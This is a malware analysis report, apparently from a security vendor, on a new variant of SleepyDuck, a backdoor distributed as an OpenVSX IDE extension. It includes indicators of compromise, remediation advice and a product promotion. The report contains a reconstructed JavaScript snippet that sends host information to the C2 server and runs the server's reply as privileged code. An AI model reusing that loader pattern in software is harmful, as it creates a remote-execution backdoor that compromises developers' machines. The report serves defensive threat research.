SleepyDuck Evolution

Summary

SleepyDuck is a minimal backdoor that collects system information and communicates with a Command-and-Control (C2) server via HTTPS. The sample executes the data received from the C2 in memory.

Background

This is not the first time the malware has been discovered in the OpenVSX marketplace. The previous iteration was an equally compact backdoor that demonstrated the same supply-chain attack vector explored in the SleepyDuck campaign. Both variations of this backdoor illustrate how small IDE extensions can be weaponized to establish remote command execution channels under the guise of developer tooling.

In the first iteration, SleepyDuck used a Solana-based command and control architecture. When executed, the backdoor initialized a vm instance and pulled the latest configuration data from an on-chain smart contract via a Solana RPC. After this, the malware entered a continuous polling loop for tasking.

The C2 server smart contract for the early variant was sleepyduck[.]xyz and the backdoor polled it every 30 seconds. The smart contract allowed operators to remotely update polling intervals and issue commands to all infected endpoints without direct network contact.

New Variant

The new SleepyDuck malware drops the blockchain persistence model in favor of a more traditional HTTPS-based C2 design. It retains the original distinctive ASCII duck header and compact loader structure but introduces several noteworthy changes.

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⡶⠿⠿⠷⣶⣄⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠁⠀⠀⢀⣀⡀⠙⣷⡀⠀⠀⠀
⠀⠀⠀⡀⠀⠀⠀⠀⠀⢠⣿⠁⠀⠀⠀⠘⠿⠃⠀⢸⣿⣿⣿⣿
⠀⣠⡿⠛⢷⣦⡀⠀⠀⠈⣿⡄⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⠟
⢰⡿⠁⠀⠀⠙⢿⣦⣤⣤⣼⣿⣄⠀⠀⠀⠀⠀⢴⡟⠛⠋⠁⠀
⣿⠇⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀⠈⣿⡀⠀⠀⠀
⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⡇⠀⠀⠀
⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡇⠀⠀⠀
⠸⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡿⠀⠀⠀⠀
⠀⠹⣷⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣰⡿⠁⠀⠀⠀⠀
⠀⠀⠀⠉⠙⠛⠿⠶⣶⣶⣶⣶⣶⠶⠿⠟⠛⠉⠀⠀⠀

The variant continues to collect host telemetry and generates a unique machine identifier derived from a SHA-256 hash of that data. Unlike the Ethereum variant, the new sample posts the collected information to hxxps://function.undefined21[.]com/p. Another notable difference in this variant is the account used to publish the malware was named after security researcher John Tuckner rather than the previously observed usage of the developer Juan Blanco’s name.

Description

When run, the malware collects system information including the hostname, username, platform, and MAC address. It creates a system identifier from the first 16 characters of the SHA-256 hash of the hostname, MAC, and platform values. The malware then communicates with a C2 server via HTTPS. The server address is obfuscated in the original code and deobfuscates to hxxps://function.undefined21[.]com. The malware issues a POST request to the path /p with the collected telemetry in JSON format. It treats the response from the C2 server as JavaScript and executes it inside a vm context whose globals include require, process, Buffer, and the network and filesystem modules, so code served by the C2 can perform the same privileged operations as the backdoor itself.

const https = require('https');
const vm = require('vm');
const fs = require('fs');
const os = require('os');
const path = require('path');
// DOMAIN (deobfuscated to function.undefined21[.]com) and SYSTEM_INFO (the
// hostname, username, platform, MAC and derived identifier) are built earlier
// in the sample; `apple` is referenced exactly as in the analyst's snippet.

const options = {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' }
};

// POST the collected telemetry to /p and buffer the whole response body.
const req = https.request("https://" + DOMAIN + '/p', options, (res) => {
    let responseBody = '';
    res.on('data', (chunk) => responseBody += chunk);
    res.on('end', () => {
        try {
            // The response is treated as JavaScript and run with access to
            // require, process, fs and the network: no signature, no validation.
            const context = vm.createContext(
                { console, require, process, Buffer, https, apple, fs, os, path }
            );
            vm.runInContext(responseBody, context);
        } catch (e) {
            // Errors are swallowed silently, so a failed payload leaves no trace.
        }
    });
});

req.write(JSON.stringify(SYSTEM_INFO));
req.end();

The code above is an analyst reconstruction of a snippet of JavaScript from the malware, highlighting the main capability of the new variant: it issues an HTTPS request to the C2 server and streams the response into a buffer, creates a vm sandbox with the host objects mentioned earlier, and immediately executes the fetched text inside that context with vm.runInContext.

The C2 Server

The C2 server is flagged by one security vendor on VirusTotal as malicious. Three paths have been identified on the remote server. The path /p is used by the malware to send POST requests containing information about the infected system. Visiting the malicious website reveals the two remaining paths, /login and /dashboard. Below is what a user would see when visiting the site.

The login screen appears to accept only a password. The paths observed in the network traffic suggest this website is the dashboard used to track infected systems and issue commands for them to execute. This infrastructure could be leveraged to deliver a fully capable Malware-as-a-Service (MaaS) platform, a notable trend on other fronts.

Host-Based Indicators

File Hashes

  • Extension
    MD5: 75e2e03e47902bf7f43cecb7ab2175ea
    SHA256: afccbf2f973c94a36a726ed8b53106b1b491d25a3e55aa7b6092742989cab7ae
    Name: Nomic.hardhat-0.8.26.vsix

  • Malicious JavaScript
    MD5: d4988bee794258a51daac3b7cf1fc5d6
    SHA256: 500d250caa3bde6fbcbe627aff9e4a1377220358852b05e54378c8aa8f9f3591
    Name: webpack.js

Network-Based Indicators

  • URL: hxxps://function.undefined21[.]com
    • Note: Sends POST request to the path /p

Remediation

We recommend adding alerts for sudden changes to installed extensions from OpenVSX, including new outbound TLS endpoints or unusual process behavior immediately after extension updates. Furthermore, ensure your endpoint detection and response (EDR) systems are not only updated with the indicators identified in this report but also tuned to flag behaviors common to malicious extensions, such as unusual network traffic, unauthorized credential access, or persistence mechanisms. Regular validation of detection rules and proactive threat hunting can help catch variants that evolve beyond known indicators.

Defense shouldn’t stop there — the dev-guard extension, built and maintained by the Yeeth Security team, adds a crucial layer of protection for VS Code and Cursor AI users. By continuously monitoring new campaigns and pushing live updates, dev-guard helps shut down these threats before they can spread across the developer community.